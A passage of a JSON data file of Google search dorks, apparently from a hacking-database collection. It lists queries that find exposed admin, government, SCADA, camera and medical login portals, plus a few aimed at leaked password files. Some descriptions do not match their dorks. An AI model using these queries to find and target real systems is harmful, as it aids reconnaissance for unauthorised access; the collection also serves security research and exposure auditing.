Management Software\" Jira login\r\n# Pages Containing Login Portals\r\n# Date: 04/09/2021 \r\n# Exploit Author: KnoxPro BugHunter"}, {"dork": "intext:\"Admin Login\" inurl:\"/login.aspx\"", "description": "# Google Dork: intext:\"Admin Login\" inurl:\"/login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date: 06/09/2021 \r\n# Exploit Author: Ujas Dhami"}, {"dork": "intitle:\"Gitea\" \"This website works better with JavaScript\" \"sign in\" \" Home\" \"Explore\"-.com", "description": "# Google Dork: intitle:\"WATTrouter\" \"SYSTEM WEB INTERFACE\"\r\n# Pages Containing Login Portals\r\n# Date: 06/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"F660\" intext:\"ZTE Corporation. All rightsreserved.\"", "description": "# Google Dork: intitle:\"F660\" intext:\"ZTE Corporation. All rights reserved.\"\r\n# Pages Containing Login Portals\r\n# Date: 06/09/2021\r\n# Exploit Author: Herve Yao Nyhl"}, {"dork": "intitle:\"MultiView\" \"MultiView Events\" \"MOBOTIX\"", "description": "# Google Dork: intitle:\"MultiView\" \"MultiView Events\" \"MOBOTIX\"\r\n# Various Online Devices.\r\n# Date: 6/09/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:login intext:\"Powered by Plone & Python\" -plone.org", "description": "# Google Dork: inurl:login intext:\"Powered by Plone & Python\" -plone.org\r\n# Pages Containing Login Portals\r\n# Date: 06/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:\"/bitrix/admin/\" intitle:\"Autorisation\"", "description": "# Google Dork: inurl:\"/bitrix/admin/\" intitle:\"Autorisation\"\r\n# Pages Containing Login Portals\r\n# Date: 07/09/2021\r\n# Exploit Author: Herve Yao Nyhl"}, {"dork": "inurl /admin/login intitle panel admin site:\"*.in\"", "description": "# Google Dork: inurl /admin/login intitle panel admin site:\"*.in\"\r\n# Pages Containing Login Portals\r\n# Date: 06/09/2021 \r\n# Exploit Author: Sarthi Shinde"}, {"dork": "intitle:\"admin panel\" OR intitle:\"request password\" intext:\"email address\"", "description": "# Exploit Title: intitle:\"admin panel\" OR intitle:\"request password\" intext:\"email address\"\r\n# Date: 07/09/2021\r\n# Exploit Author: Gonzalo Carrasco"}, {"dork": "intitle:\"admin login\" site:.gov", "description": "# Google Dork: intitle:\"admin login\" site:.gov\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"faculty login\"", "description": "# Google Dork: intitle:\"faculty login\"\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "site:wiki.*.com inurl:login.action", "description": "# Google Dork: site:wiki.*.com inurl:login.action\r\n# Pages Containing Login Portals\r\n# Date: 07/09/2021 \r\n# Exploit Author: Brahmaraj Rathod"}, {"dork": "inurl:login_fail.asp", "description": "# Google Dork: J. Igor Melo\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "\"Welcome to Polycom Web Configuration Utility\" \"Login as\" \"Password\"", "description": "# Google Dork: \"Welcome to Polycom Web Configuration Utility\" \"Login as\" \"Password\"\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"MedDream\" \"Softneta\" -.com", "description": "# Google Dork: intitle:\"MedDream\" \"Softneta\" -.com\r\n# Pages Containing Login Portals\r\n# Date: 09/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"TestRail\" inurl:\"/index.php?/auth/login/\"", "description": "# Google Dork: intitle:\u201dTestRail\u201d inurl:\u201d/index.php?/auth/login/\u201c\r\n# Pages Containing Login Portals\r\n# Date: 06/09/2021 \r\n# Exploit Author: Vismit Rakhecha"}, {"dork": "\"Username\" \"Password\" \"This system is for authorized use only.\" intitle:\"Gaia\"", "description": "# Google Dork: \"Username\" \"Password\" \"This system is for authorized use only.\" intitle:\"Gaia\"\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:(\"admin/password.php\") +site:.com", "description": "# Google Dork: inurl:(\"admin/password.php\") +site:.com\r\n# Pages Containing Login Portals\r\n# Date: 09/09/2021 \r\n# Exploit Author: Sanjay Singh"}, {"dork": "intitle:\"admin login\" site:.gov", "description": "# Google Dork: intitle:\"admin login\" site:.gov\r\n# Pages Containing Login Portals\r\n# Date: 09/09/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"faculty login\"", "description": "# Google Dork: intitle:\"faculty login\"\r\n# Pages Containing Login Portals\r\n# Date: 09/09/2021 \r\n# Exploit Author: Aftab Alam"}, {"dork": "cms inurl:login site:\"gov.ae\"", "description": "# Google Dork: cms inurl:login site:\"gov.ae\"\r\n# Pages Containing Login Portals\r\n# Date: 12/09/2021 \r\n# Exploit Author: Saiju Pillai"}, {"dork": "site:.com inurl:(\"administrator/login.php\" OR \"admin/login.php\")", "description": "# Google Dork: site:.com inurl:(\"administrator/login.php\" OR \"admin/login.php\")\r\n# Pages Containing Login Portals\r\n# Date: 10/09/2021 \r\n# Exploit Author: Madan Kumawat"}, {"dork": "intitle:\"D-link\" intext:\"SharePort Web Access\" \"Hardware Version\" \"Firmware Version\"", "description": "# Google Dork: intitle:\"D-link\" intext:\"SharePort Web Access\" \"Hardware Version\" \"Firmware Version\"\r\n# Pages Containing Login Portals\r\n# Date: 10/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:destination=portals", "description": "# Google Dork: inurl:destination=portals\r\n# Pages Containing Login Portals\r\n# Date: 11/09/2021 \r\n# Exploit Author: Vaibhav Kumar Srivastava"}, {"dork": "Pages Containing Login Portals", "description": "#Google Dork: intitle:\"admin login\" site:.pk\r\n#Pages Containing Login Portals\r\n#Date: 11/09/2021\r\n#Exploit Author: Bilal Qureshi"}, {"dork": "site:pastebin.com intext:\"password\" | intitle:\"password\"", "description": "# Google Dork: site:pastebin.com intext:\"password\" | intitle:\"password\"\r\n# Pages Containing Login Portals\r\n# Date: 11/09/2021 \r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"Zimbra Web Client Sign In\" \"Synacor\"", "description": "# Google Dork: intitle:\"Zimbra Web Client Sign In\" \"Synacor\"\r\n# Pages Containing Login Portals\r\n# Date: 12/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"login\" \"Clare Controls LLC\"", "description": "# Google Dork: intitle:\"login\" \"Clare Controls LLC\"\r\n# Pages Containing Login Portals\r\n# Date: 11/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "site:\".om\" intitle:\"login\"", "description": "# Google Dork: site:\".om\" intitle:\"login\"\r\n# Pages Containing Login Portals\r\n# Date: 14/09/2021 \r\n# Exploit Author: Saiju Pillai"}, {"dork": "intitle:\"admin login\" site:.net", "description": "# Google Dork: intitle:\"admin login\" site:.net\r\n# Pages Containing Login Portals\r\n# Date: 12/09/2021 \r\n# Exploit Author: Priya Dalal"}, {"dork": "intitle:\"admin login\" site:.org", "description": "# Google Dork: intitle:\"admin login\" site:.org\r\n# Pages Containing Login Portals\r\n# Date: 13/09/2021\r\n# Exploit Author: Bhavin Amesara"}, {"dork": "intitle:\"Login - splunk\"", "description": "# Google Dork: intitle:\"Login - splunk\"\r\n# Pages Containing Login Portals\r\n# Date: 14/09/2021 \r\n# Exploit Author:Saiju Pillai"}, {"dork": "intitle:\"oracle login\" site:.gov", "description": "# Google Dork: intitle:\"oracle login\" site:.gov\r\n# Pages Containing Login Portals\r\n# Date: 14/09/2021 \r\n# Exploit Author: Saiju Pillai"}, {"dork": "inurl:employee-login.html", "description": "# Google Dork: inurl:employee-login.html\r\n# Pages Containing Login Portals\r\n# Date: 14/09/2021 \r\n# Exploit Author: Saiju Pillai"}, {"dork": "inurl:login intext:\" fiesta login\"", "description": "# Google Dork: inurl:login intext:\" fiesta login\"\r\n# Pages Containing Login Portals\r\n# Date: 15/09/2021 \r\n# Exploit Author: Saiju Pillai"}, {"dork": "intitle:\"admin login\" site:.in", "description": "# Google Dork: intitle:\"admin login\" site:.in\r\n# Pages Containing Login Portals\r\n# Date: 15/09/2021 \r\n# Exploit Author: Priya Dalal"}, {"dork": "\" Stanford CoreNLP \" \"Visualisation provided using the brat visualisation\"", "description": "# Google Dork: \" Stanford CoreNLP \" \"Visualisation provided using the brat visualisation\"\r\n# Various Online Devices\r\n# Date: 15/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "Google Dork: inurl:\"admin/login\" site:\".gov.in\"", "description": "# Google Dork: inurl:\"admin/login\" site:\".gov.in\"\r\n# Pages Containing Login Portals\r\n# Date: 16/09/2021\r\n# Exploit Author: Bhavin Amesara"}, {"dork": "site:*/admin.php inurl:admin", "description": "# Google Dork: site:*/admin.php inurl:admin\r\n# Pages Containing Login Portals\r\n# Date:17/09/2021\r\n# Exploit Author: Sonu Chaudhary"}, {"dork": "intext:Provided by ProjectSend", "description": "# Google Dork: intitle:\"Polycom Login\" inurl:\"/login.html\"\r\n# Pages Containing Login Portals\r\n#Date: 30/08/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle|inurl:\"SCADA login\"", "description": "# Google Dork: intitle|inurl:\"SCADA login\"\r\n# Pages Containing Login Portals\r\n# Date:16/09/2021\r\n# Exploit Author: Cyber Shelby"}, {"dork": "allinurl:logon.html CSCOE", "description": "# Google Dork: allinurl:logon.html CSCOE\r\n# Pages Containing Login Portals\r\n# Date:19/09/2021\r\n# Exploit Author: Yazan Z\u00a0Al-Mallah"}, {"dork": "companies' service login Login Portal", "description": "# Google Dork: companies' service login Login Portal\r\n# Pages Containing Login Portals\r\n# Date: 17/09/2021 \r\n# Exploit Author: Sonu Chaudhary"}, {"dork": "intitle:\"Intelbras\" \"All Rights Reserved\" -.com", "description": "# Google Dork: intitle:\"Intelbras\" \"All Rights Reserved\" -.com\r\n# Pages Containing Login Portals\r\n# Date: 15/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle|inurl::\"IoT login\"", "description": "# Google Dork: intitle|inurl::\"IoT login\"\r\n# Pages Containing Login Portals\r\n# Date:23/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "inurl: login.http", "description": "# Google Dork: inurl: login.http\r\n# Pages Containing Login Portals\r\n# Date:23/09/2021\r\n# Exploit Author: Poulami Kayal"}, {"dork": "inurl:/admin/AdminLogin.jsp intitle:\"CERGY - Administration\"", "description": "# Google Dork: inurl:/admin/AdminLogin.jsp intitle:\"CERGY - Administration\"\r\n# Pages Containing Login Portals \r\n# Date: 22/07/2021 \r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"Codian MCU - login\" \"Copyright TANDBERG\"", "description": "# Google Dork: intitle:\"Codian MCU - login\" \"Copyright TANDBERG\"\r\n# Pages Containing Login Portals\r\n# Date: 18/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"admin login\" site:.gov.in", "description": "# Google Dork: intitle:\"admin login\" site:.gov.in\r\n# Pages Containing Login Portals\r\n# Date: 21/09/2021 \r\n# Exploit Author: Deven Rathod"}, {"dork": "intitle:administration intext:\"portail\" \"Login\"", "description": "# Google Dork: intitle:administration intext:\"portail\" \"Login\"\r\n# Pages Containing Login Portals\r\n# Date: 24/09/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "inurl:login.rsp \"User name\"", "description": "# Google Dork: inurl:login.rsp \"User name\"\r\n# Pages Containing Login Portals\r\n# Date: 24/09/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "inurl:saml2/login", "description": "# Google Dork: inurl:saml2/login\r\n# Pages Containing Login Portals\r\n# Date:27/09/2021\r\n# Exploit Author: Javier Bernardo"}, {"dork": "inurl:\"profile/login\"", "description": "# Google Dork: inurl:\"profile/login\"\r\n# Pages Containing Login Portals\r\n# Date: 28/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intitle:\"Welcome\" intext:\"Login\"", "description": "# Google Dork: intitle:\"Welcome\" intext:\"Login\"\r\n# Pages Containing Login Portals\r\n# Date: 28/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intext:\"Infinitium Copyrights Reserved\"", "description": "# Google Dork: intext:\"Infinitium Copyrights Reserved\"\r\n# Pages Containing Login Portals\r\n# Date:30/08/2021\r\n# Exploit Author: Mohammad Zulfiqar WARDI"}, {"dork": "site:*/etc/passwd inurl\"/etc/passwd\"", "description": "# Google Dork: site:*/etc/passwd inurl\"/etc/passwd\"\r\n# Pages Containing Login Portals\r\n# Date: 20/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"webcam\" \"login\"", "description": "# Google Dork: intitle:\"webcam\" \"login\"\r\n# Pages Containing Login Portals\r\n# Date:30/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "site:*/oauth/authorize", "description": "# Google Dork: site:*/oauth/authorize\r\n# Pages Containing Login Portals\r\n# Date: 04/10/2021 \r\n# Exploit Author: Reza Abasi"}, {"dork": "inurl:.html.php:intext:\"admin\"|intext:\"user\"|intext:\"login\":site:\".in\"", "description": "# Google Dork: inurl:.html.php:intext:\"admin\"|intext:\"user\"|intext:\"login\":site:\".in\"\r\n# Pages Containing Login Portals\r\n# Dtae: 25/09/2021\r\n# Author: Adarsh S"}, {"dork": "intitle:\"Dericam\" \"Remember Me\"", "description": "#Google Dork: intitle:\"Dericam\" \"Remember Me\" \r\n# Pages Containing Login Portals\r\n# Date: 30/08/2021 \r\n# Exploit Author: Neha Singh"}, {"dork": "inurl: /admin/login.php intitle: panel admin", "description": "# Google Dork: inurl: /admin/login.php intitle: panel admin\r\n# Pages Containing Login Portals\r\n# Date:01/10/2021\r\n# Exploit Author: Bhavin Amesara"}, {"dork": "inurl:admin/reset.php -github", "description": "# Google Dork: inurl:admin/reset.php -github\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021 \r\n# Exploit Author: Vaibhav Kumar Srivastava"}, {"dork": "intext:Provided by ProjectSend", "description": "# Google Dork: intext:Provided by ProjectSend\r\n# Pages Containing Login Portals\r\n# Date: 30/08/2021\r\n# Exploit Author: Abdullah Kala"}, {"dork": "inurl: \"admin-login.php\"", "description": "# Google Dork: inurl: \"admin-login.php\"\r\n# Pages Containing Login Portals\r\n# Date:04/10/2021\r\n# Exploit Author: Zeshan Ahmad"}, {"dork": "Dork - inurl: \"site admin\"", "description": "# Google Dork: Dork - inurl: \"site admin\"\r\n# Pages Containing Login Portals\r\n# Date:04/10/2021\r\n# Exploit Author: Zeshan Ahmad"}, {"dork": "Fwd: intitle:\"Login\" \"FLX Web Server\"", "description": "# Google Dork: Fwd: intitle:\"Login\" \"FLX Web Server\"\r\n# Pages Containing Login Portals\r\n# Date:07/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "inurl:/webmail/src/login.php intext:\"SquirrelMail\"", "description": "# Google Dork: inurl:/webmail/src/login.php intext:\"SquirrelMail\"\r\n# Pages Containing Login Portals\r\n# Date:11/10/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "Fwd: intitle:\"Zimbra Web Client Sign In\" \"Synacor\"", "description": "# Google Dork: Fwd: intitle:\"Zimbra Web Client Sign In\" \"Synacor\"\r\n# Pages Containing Login Portals\r\n# Date:08/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "Fwd: intitle:\"Project Insight - Login\" \"Sign In to Continue\" \"Shift4 Payments\"", "description": "# Google Dork: Fwd: intitle:\"Project Insight - Login\" \"Sign In to Continue\" \"Shift4 Payments\"\r\n# Pages Containing Login Portals\r\n# Date:09/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "inurl:sap/public/ intext:Logon \"Password\"", "description": "# Google Dork: inurl:sap/public/ intext:Logon \"Password\"\r\n# Pages Containing Login Portals\r\n# Date:09/10/2021\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intext:\"Open Game Panel 2021\"", "description": "# Google Dork: intext:\"Open Game Panel 2021\"\r\n# Pages Containing Login Portals\r\n# Date:10/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "site:\"*.com\" inurl: admin/index.php", "description": "# Google Dork: site:\"*.com\" inurl: admin/index.php\r\n# Pages Containing Login Portals\r\n# Date:09/10/2021\r\n# Exploit Author: adreeta maity"}, {"dork": "intitle:\"Portal\" & (inurl:\"login.asp\" | inurl:\"login.aspx\")", "description": "# Google Dork: intitle:\"Portal\" & (inurl:\"login.asp\" | inurl:\"login.aspx\")\r\n# Pages Containing Login Portals\r\n# Date:13/10/2021\r\n# Exploit Author: Muhammad Ali Akbar"}, {"dork": "intitle:\"Portal\" inurl:\"login.php\"", "description": "# Google Dork: intitle:\"Portal\" inurl:\"login.php\"\r\n# Pages Containing Login Portals\r\n# Date:13/10/2021\r\n# Exploit Author: Muhammad Ali Akbar"}, {"dork": "\"com.sap.itsam.problems.java.systeminfo\"", "description": "# Google Dork: \"com.sap.itsam.problems.java.systeminfo\"\r\n# Pages Containing Login Portals\r\n# Date:13/10/2021\r\n# Exploit Author: GnosticPlayers"}, {"dork": "intitle:cisco \"This is a restricted Access Server\"", "description": "# Google Dork: intitle:cisco \"This is a restricted Access Server\"\r\n# Pages Containing Login Portals\r\n# Date:14/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intitle:vmware \"This is a restricted Access Server\"", "description": "# Google Dork: intitle:vmware \"This is a restricted Access Server\"\r\n# Pages Containing Login Portals\r\n# Date:14/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "inurl:mail intitle:Webmail - Login", "description": "# Google Dork: inurl:mail intitle:Webmail - Login\r\n# Pages Containing Login Portals\r\n# Date: 15/10/2021 \r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo\r\n# Mail Service Enumeration"}, {"dork": "inurl:/admin/login.php intitle: \"panel\"", "description": "# Google Dork: inurl:/admin/login.php intitle: \"panel\"\r\n# Pages Containing Login Portals\r\n# Date: 14/10/2021\r\n# Exploit Author: Roshdy Essam"}, {"dork": "Fwd: intitle:\"MedDream\" \"Softneta\" -.com", "description": "# Google Dork: Fwd: intitle:\"MedDream\" \"Softneta\" -.com\r\n# Pages Containing Login Portals\r\n# Date:15/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "Fwd: inurl:\"/sslvpn_logon.shtml\" intitle:\"User Authentication\" \"WatchGuard Technologies\"", "description": "# Google Dork: Fwd: inurl:\"/sslvpn_logon.shtml\" intitle:\"User Authentication\" \"WatchGuard Technologies\"\r\n# Pages Containing Login Portals\r\n# Date:16/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "intitle:\"Portal\" inurl:\"login.jsp\"", "description": "# Google Dork: intitle:\"Portal\" inurl:\"login.jsp\"\r\n# Pages Containing Login Portals\r\n# Date:18/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"SonicWall Analyzer Login\"", "description": "# Google Dork: intitle:\"SonicWall Analyzer Login\"\r\n# Pages Containing Login Portals\r\n# Date:18/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "intitle:\"Issabel login - page\"", "description": "# Google Dork: intitle:\"Issabel login - page\"\r\n# Pages Containing Login Portals\r\n# Date:19/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intitle:\"Juniper Networks Web\" \"Log In\"", "description": "# Google Dork: intitle:\"Juniper Networks Web\" \"Log In\"\r\n# Pages Containing Login Portals\r\n# Date:19/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "Fwd: intitle:\"Support Portal\" intext:\"Bomgar Corporation. Redistribution Prohibited. All Rights Reserved.\" \"Representatives\"", "description": "# Google Dork: intitle:\"Support Portal\" intext:\"Bomgar Corporation. Redistribution Prohibited. All Rights Reserved.\" \"Representatives\"\r\n# Pages Containing Login Portals\r\n# Date: 19/10/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"/?page=login\"", "description": "# Google Dork: inurl:\"/?page=login\"\r\n# Pages Containing Login Portals\r\n# Date: 19/10/2021 \r\n# Exploit Author: Reza Abasi"}, {"dork": "inurl:\"/?a=login\" intext:\"login\"", "description": "# Google Dork: inurl:\"/?a=login\" intext:\"login\"\r\n# Pages Containing Login Portals\r\n# Date: 19/10/2021 \r\n# Exploit Author: Reza Abasi"}, {"dork": "Fwd: intitle:\"Cloudphysician RADAR\"", "description": "# Google Dork: intitle:\"Cloudphysician RADAR\"\r\n# Pages Containing Login Portals (EMR Systems)\r\n# Date: 20/10/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "filetype:conf intext:\"Footer Powered By\"", "description": "# Google Dork: filetype:conf intext:\"Footer Powered By\"\r\n# Pages Containing Login Portals\r\n# Date: 20/10/2021\r\n# Exploit Author: Sandesh Ajgekar"}, {"dork": "\"fluig\" \"login\"", "description": "# Google Dork: \"fluig\" \"login\"\r\n# Pages Containing Login Portals\r\n# Date: 20/10/2021\r\n# Exploit Author: Dennis Silva"}, {"dork": "intitle:\"CMS\" inurl:\"login.php\"", "description": "# Google Dork: intitle:\"CMS\" inurl:\"login.php\"\r\n# Pages Containing Login Portals\r\n# Date:21/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "site:*/membership-login/", "description": "# Google Dork: site:*/membership-login/\r\n# Pages Containing Login Portals\r\n# Date:21/10/2021\r\n# Exploit Author: reza abasi"}, {"dork": "intitle:\"TYPO3 CMS Login\"", "description": "# Google Dork: intitle:\"TYPO3 CMS Login\"\r\n# Pages Containing Login Portals\r\n# Date:21/10/2021\r\n# Exploit Author: Simone Crema"}, {"dork": "intitle:\"Sign in [Jenkins]\" inurl:\"login?from\"", "description": "# Google Dork: intitle:\"Sign in [Jenkins]\" inurl:\"login?from\"\r\n# Pages Containing Login Portals\r\n# Date:21/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "inurl:/designs/imm/index.php", "description": "# Google Dork: inurl:/designs/imm/index.php\r\n# Pages Containing Login Portals\r\n# Date:22/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intitle:\"Sophos\" inurl:/userportal/webpages/myaccount/login.jsp", "description": "# Google Dork: intitle:\"Sophos\" inurl:/userportal/webpages/myaccount/login.jsp\r\n# Pages Containing Login Portals\r\n# Date:22/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "inurl:fgtauth?", "description": "# Google Dork: inurl:fgtauth?\r\n# Pages Containing Login Portals\r\n# Date:22/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "inurl:/phpldapadmin/cmd.php", "description": "# Google Dork: inurl:/phpldapadmin/cmd.php\r\n# Pages Containing Login Portals\r\n# Date:22/10/2021\r\n# Exploit Author: Na\u00efm Gallouj"}, {"dork": "allintitle:\"MeshCentral - Login\"", "description": "# Google Dork: allintitle:\"MeshCentral - Login\"\r\n# Pages Containing Login Portals\r\n# Date:25/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intitle:\"CMS\" inurl:\"login.jsp\"", "description": "# Google Dork: intitle:\"CMS\" inurl:\"login.jsp\"\r\n# Pages Containing Login Portals\r\n# Date:25/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"HRMS\" inurl:\"login.aspx\"", "description": "# Google Dork: intitle:\"HRMS\" inurl:\"login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date:25/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "inurl:\"index.php\" intitle:\"CMS Login\"", "description": "# Google Dork: inurl:\"index.php\" intitle:\"CMS Login\"\r\n# Pages Containing Login Portals\r\n# Date:26/10/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"Student\" inurl:\"login.aspx\"", "description": "# Google Dork: intitle:\"Student\" inurl:\"login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date:25/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"Employee Login\" & inurl:(\"login.aspx\" | \"login.asp\")", "description": "# Google Dork: intitle:\"Employee Login\" & inurl:(\"login.aspx\" | \"login.asp\")\r\n# Pages Containing Login Portals\r\n# Date:26/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"Journal\" inurl:\"login.aspx\"", "description": "# Google Dork: intitle:\"Journal\" inurl:\"login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date:26/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intext:Project hosted at: For support, contact: Copyright Openbravo", "description": "# Google Dork: intext:Project hosted at: For support, contact: Copyright Openbravo\r\n# Pages Containing Login Portals\r\n# Date:26/10/2021\r\n# Exploit Author: Na\u00efm Gallouj"}, {"dork": "site:.bd http intitle: admin", "description": "# Google Dork: site:.bd http intitle: admin\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: MD. Rimel"}, {"dork": "intitle:\"Admin Login\" inurl:\"login.aspx\"", "description": "# Google Dork: intitle:\"Admin Login\" inurl:\"login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date:26/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "inurl:login/users.pwd", "description": "# Google Dork: inurl:login/users.pwd\r\n# Pages Containing Login Portals\r\n# Date:27/10/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "inurl:\"wp-login.php?action=login\"", "description": "# Google Dork: inurl:\"wp-login.php?action=login\"\r\n# Pages Containing Login Portals\r\n# Date:27/10/2021\r\n# Exploit Author: Reza Abasi"}, {"dork": "intitle:\"LoRaWAN Login\"", "description": "# Google Dork: intitle:\"LoRaWAN Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intext: \"mailenable\" inurl:\"/lang/sys/login.aspx\"", "description": "# Google Dork: intext: \"mailenable\" inurl:\"/lang/sys/login.aspx\"\r\n# Files Containing Juicy Info\r\n# Date:27/10/2021\r\n# Exploit Author: Nisrin Ahmed"}, {"dork": "intitle:Hikvision login page", "description": "# Google Dork: intitle:Hikvision login page\r\n# Pages Containing Login Portals\r\n# Date:28/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "intitle:ip camera login page", "description": "# Google Dork: intitle:ip camera login page\r\n# Pages Containing Login Portals\r\n# Date:28/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "intitle:TYPO3 CMS Login: New TYPO3 site inurl:/typo3/index.php", "description": "# Google Dork: intitle:TYPO3 CMS Login: New TYPO3 site inurl:/typo3/index.php\r\n# Pages Containing Login Portals\r\n# Date:28/10/2021\r\n# Exploit Author: Na\u00efm Gallouj"}, {"dork": "inurl:\"brandmeister page=login\"", "description": "# Google Dork: inurl:\"brandmeister page=login\"\r\n# Pages Containing Login Portals\r\n# Date:29/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "intext:\"admin\" AND \"login\" | \"sign in\" AND \"\u00a9\" AND \"rights reserved\"", "description": "# Google Dork: intext:\"admin\" AND \"login\" | \"sign in\" AND \"\u00a9\" AND \"rights reserved\"\r\n# Pages Containing Login Portals\r\n# Date:29/10/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"I-Portal\" inurl:\"login.jsp\"", "description": "# Google Dork: intitle:\"I-Portal\" inurl:\"login.jsp\"\r\n# Pages Containing Login Portals\r\n# Date: 30/10/2021 \r\n# Exploit Author: Jawhar Milkan"}, {"dork": "intitle:\"RM Portal\"", "description": "# Google Dork: intitle:\"RM Portal\"\r\n# Pages Containing Login Portals\r\n# Date: 30/10/2021\r\n# Exploit Author: Dennis Silva"}, {"dork": "intitle:\"TOTVS SmartClient HTML - Par\u00e2metros Iniciais\"", "description": "# Google Dork: intitle:\"TOTVS SmartClient HTML - Par\u00e2metros Iniciais\"\r\n# Pages Containing Login Portals\r\n# Date: 30/10/2021\r\n# Exploit Author: Dennis Silva"}, {"dork": "intitle:\"Gophish - Login\"", "description": "# Google Dork: intitle:\"Gophish - Login\"\r\n# Pages Containing Login Portals\r\n# Date:31/10/2021\r\n# Exploit Author: Piyush Patil"}, {"dork": "intitle:\"Kerio Connect Client\" inurl:\"/webmail/login/\"", "description": "# Google Dork: intitle:\"Kerio Connect Client\" inurl:\"/webmail/login/\"\r\n# Pages Containing Login Portals\r\n# Date:2/11/2021\r\n# Exploit Author: Nisrin Ahmed"}, {"dork": "inurl:/carbon/admin/login.jsp", "description": "# Google Dork: site:*.example.com inurl:/carbon/admin/login.jsp\r\n# Category: Pages Containing Login Portals\r\n# Date: 05/11/2021\r\n# Author: Girish"}, {"dork": "intext:\"Powered by \" inurl:/login", "description": "# Google Dork intext:\"Powered by \" inurl:/login\r\n# Pages Containing Login Portals\r\n# Date: 03/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:newsdesk.cgi?", "description": "# Google Dork: inurl:newsdesk.cgi?\r\n# Pages Containing Login Portals\r\n# Date: 05/11/2021 \r\n# Exploit Author: Shubh Mishra"}, {"dork": "intext:\"untitled\" intext:\"login\" filetype:php", "description": "# Google Dork: intext:\"untitled\" intext:\"login\" filetype:php\r\n# Pages Containing Login Portals\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"untitled\" intext:\"password\" filetype:php", "description": "# Google Dork: intext:\"untitled\" intext:\"password\" filetype:php\r\n# Files Containing Juicy Info\r\n# 